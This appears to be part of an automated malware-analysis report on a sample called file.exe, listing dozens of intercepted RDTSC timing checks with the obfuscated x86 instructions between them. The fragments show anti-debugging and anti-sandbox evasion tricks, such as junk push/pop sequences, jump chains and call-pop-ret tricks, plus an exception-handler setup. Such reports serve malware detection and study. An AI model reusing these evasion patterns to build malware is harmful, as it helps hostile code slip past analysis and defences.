                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F8A2 second address: C3F8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885C786DF6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42C87 second address: C42C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42C8B second address: C42C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42C91 second address: C42CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F885D5FB12Bh 0x00000008 jmp 00007F885D5FB12Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007F885D5FB13Fh 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F885D5FB135h 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push edx 0x00000025 je 00007F885D5FB128h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e mov eax, dword ptr [eax] 0x00000030 jmp 00007F885D5FB12Bh 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jnl 00007F885D5FB126h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42CF6 second address: AC1EFF instructions: 0x00000000 rdtsc 0x00000002 js 00007F885C786DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edi 0x0000000e push dword ptr [ebp+122D0251h] 0x00000014 mov dword ptr [ebp+122D1F41h], ebx 0x0000001a call dword ptr [ebp+122D1CD2h] 0x00000020 pushad 0x00000021 jmp 00007F885C786DF6h 0x00000026 xor eax, eax 0x00000028 mov dword ptr [ebp+122D1CF6h], edx 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 jmp 00007F885C786DEEh 0x00000037 cmc 0x00000038 mov dword ptr [ebp+122D2AC4h], eax 0x0000003e js 00007F885C786DE7h 0x00000044 cld 0x00000045 mov esi, 0000003Ch 0x0000004a cmc 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f jmp 00007F885C786DEBh 0x00000054 lodsw 0x00000056 mov dword ptr [ebp+122D1CF6h], ebx 0x0000005c add eax, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D1CF6h], ebx 0x00000066 jmp 00007F885C786DF8h 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f jmp 00007F885C786DECh 0x00000074 nop 0x00000075 jp 00007F885C786DEEh 0x0000007b push edi 0x0000007c jnc 00007F885C786DE6h 0x00000082 pop edi 0x00000083 push eax 0x00000084 pushad 0x00000085 jno 00007F885C786DECh 0x0000008b push eax 0x0000008c push edx 0x0000008d pushad 0x0000008e popad 0x0000008f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42F5B second address: C42FEA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885D5FB126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 431AE77Ah 0x00000011 jmp 00007F885D5FB135h 0x00000016 push 00000003h 0x00000018 add dword ptr [ebp+122D2272h], edx 0x0000001e push 00000000h 0x00000020 jmp 00007F885D5FB131h 0x00000025 push 00000003h 0x00000027 mov si, 6DD9h 0x0000002b add dword ptr [ebp+122D1FC6h], esi 0x00000031 push 4E75EDADh 0x00000036 jmp 00007F885D5FB12Eh 0x0000003b add dword ptr [esp], 718A1253h 0x00000042 call 00007F885D5FB133h 0x00000047 pop esi 0x00000048 lea ebx, dword ptr [ebp+12454BE4h] 0x0000004e movzx ecx, di 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jc 00007F885D5FB126h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43109 second address: C4313D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F885C786DF6h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F885C786DECh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4313D second address: C4315A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F885D5FB12Ch 0x00000008 jc 00007F885D5FB126h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F885D5FB126h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4315A second address: C431AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885C786DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jbe 00007F885C786DE6h 0x00000011 pop edi 0x00000012 popad 0x00000013 pop eax 0x00000014 mov edi, dword ptr [ebp+122D1CEFh] 0x0000001a lea ebx, dword ptr [ebp+12454BEFh] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F885C786DE8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov edi, 1FA18771h 0x0000003f and cx, 8B87h 0x00000044 xchg eax, ebx 0x00000045 pushad 0x00000046 jl 00007F885C786DECh 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C542F0 second address: C5430A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885D5FB130h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5430A second address: C54317 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F885C786DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61CD4 second address: C61D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F885D5FB126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F885D5FB13Fh 0x00000012 jnc 00007F885D5FB126h 0x00000018 jmp 00007F885D5FB133h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61D08 second address: C61D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61D0C second address: C61D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6231D second address: C62321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C628B6 second address: C628C0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885D5FB126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C628C0 second address: C62904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jg 00007F885C786DEAh 0x0000000e jno 00007F885C786DECh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F885C786DEEh 0x0000001b jmp 00007F885C786DF6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63410 second address: C6343C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F885D5FB138h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F885D5FB140h 0x00000011 jc 00007F885D5FB13Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638AB second address: C638B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638B3 second address: C638B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638B7 second address: C638DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885C786DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F885C786DE6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C638DF second address: C638E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A253 second address: C6A259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A259 second address: C6A25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2DBAA second address: C2DBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F885C786DF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2DBC7 second address: C2DBD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F885D5FB126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2DBD1 second address: C2DBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C580 second address: C6C59D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F885CB96136h 0x0000000a jmp 00007F885CB96143h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C703B0 second address: C703B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FA00 second address: C6FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push edx 0x00000008 jno 00007F885CB96136h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FF7D second address: C6FFA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F885CCA3F0Ch 0x0000000c jc 00007F885CCA3F06h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F885CCA3F16h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FFA7 second address: C6FFAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FFAB second address: C6FFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70109 second address: C7010E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7010E second address: C7012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F885CCA3F13h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7012C second address: C70144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96144h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70B11 second address: C70B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7116F second address: C71176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71250 second address: C71254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71850 second address: C7186D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885CB96136h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F885CB96141h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7186D second address: C718CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b mov esi, 0DB0DDAEh 0x00000010 call 00007F885CCA3F0Fh 0x00000015 mov edi, dword ptr [ebp+122D2B5Ch] 0x0000001b pop esi 0x0000001c nop 0x0000001d push ecx 0x0000001e jp 00007F885CCA3F17h 0x00000024 jmp 00007F885CCA3F11h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e jmp 00007F885CCA3F0Bh 0x00000033 pop edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71E3D second address: C71E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F885CB9613Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72337 second address: C7233C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7233C second address: C723C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jbe 00007F885CB9613Ch 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F885CB96138h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov di, E38Fh 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F885CB96138h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c jmp 00007F885CB96148h 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 js 00007F885CB96138h 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d jp 00007F885CB96136h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72D61 second address: C72D80 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F885CCA3F13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72D80 second address: C72D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73CB8 second address: C73CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73CBE second address: C73CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C748B5 second address: C7492F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F885CCA3F0Ch 0x00000008 jg 00007F885CCA3F06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jnc 00007F885CCA3F1Eh 0x00000018 push edi 0x00000019 jmp 00007F885CCA3F12h 0x0000001e pop edi 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F885CCA3F08h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b movzx esi, dx 0x0000003e push 00000000h 0x00000040 cld 0x00000041 push 00000000h 0x00000043 clc 0x00000044 push eax 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7462F second address: C74645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F885CB96140h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74645 second address: C74656 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F885CCA3F06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C753C2 second address: C7542D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b stc 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F885CB96138h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 add dword ptr [ebp+122DBB52h], esi 0x0000002e push 00000000h 0x00000030 call 00007F885CB96140h 0x00000035 mov edi, dword ptr [ebp+122D2B10h] 0x0000003b pop esi 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F885CB96144h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75D48 second address: C75D4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C770A4 second address: C770AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C770AF second address: C770B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C050 second address: C7C06A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885CB96146h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B0EB second address: C7B0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F885CCA3F14h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0CF second address: C7D0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0DA second address: C7D0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0E3 second address: C7D0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D0E7 second address: C7D0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D2E5 second address: C7D2EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F08C second address: C7F096 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CCA3F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D2EC second address: C7D38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F885CB9613Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F885CB96138h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push edx 0x00000030 call 00007F885CB9613Fh 0x00000035 jne 00007F885CB96136h 0x0000003b pop edi 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 or dword ptr [ebp+122D2074h], ecx 0x0000004a mov eax, dword ptr [ebp+122D035Dh] 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F885CB96138h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a add ebx, 37E7580Bh 0x00000070 push FFFFFFFFh 0x00000072 mov edi, dword ptr [ebp+122D2DC4h] 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b js 00007F885CB96138h 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D38B second address: C7D391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80F41 second address: C80F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96147h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8024E second address: C80252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C80F5D second address: C80F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885CB9613Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81F86 second address: C81F90 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F885CCA3F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86052 second address: C86057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8322A second address: C83230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C842D5 second address: C842DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861E6 second address: C861EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83230 second address: C83234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C870D3 second address: C870D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C842DB second address: C842E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861EA second address: C861FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C852E7 second address: C852ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861FF second address: C86209 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F885CCA3F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C852ED second address: C852F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
